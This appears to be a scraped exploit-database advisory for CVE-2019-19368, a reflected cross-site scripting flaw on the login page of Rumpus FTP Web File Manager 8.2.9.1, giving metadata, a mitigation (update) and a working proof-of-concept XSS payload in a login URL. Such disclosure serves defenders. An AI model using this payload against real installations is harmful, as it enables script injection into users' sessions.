Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting

vendor:

Rumpus FTP Web File Manager

by:

Harshit Shukla, Sudeepto Roy

6.1

CVSS

MEDIUM

Reflected Cross-Site Scripting

CWE

Product Name: Rumpus FTP Web File Manager

Affected Version From: 8.2.9.1

Affected Version To: 8.2.9.1

Patch Exists: YES

Related CWE: CVE-2019-19368

CPE: a:maxum_development_corporation:rumpus_ftp_web_file_manager

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows & Mac

2019

Rumpus FTP Web File Manager 8.2.9.1 – Reflected Cross-Site Scripting

A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager. Payload: ?!'><sVg/OnLoAD=alert`1`// Vulnerable URL: http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//

Mitigation:

Update to the latest version released by vendor.

Source

Rumpus FTP Web File Manager 8.2.9.1 – Reflected Cross-Site Scripting

Mitigation:

Exploit-DB raw data: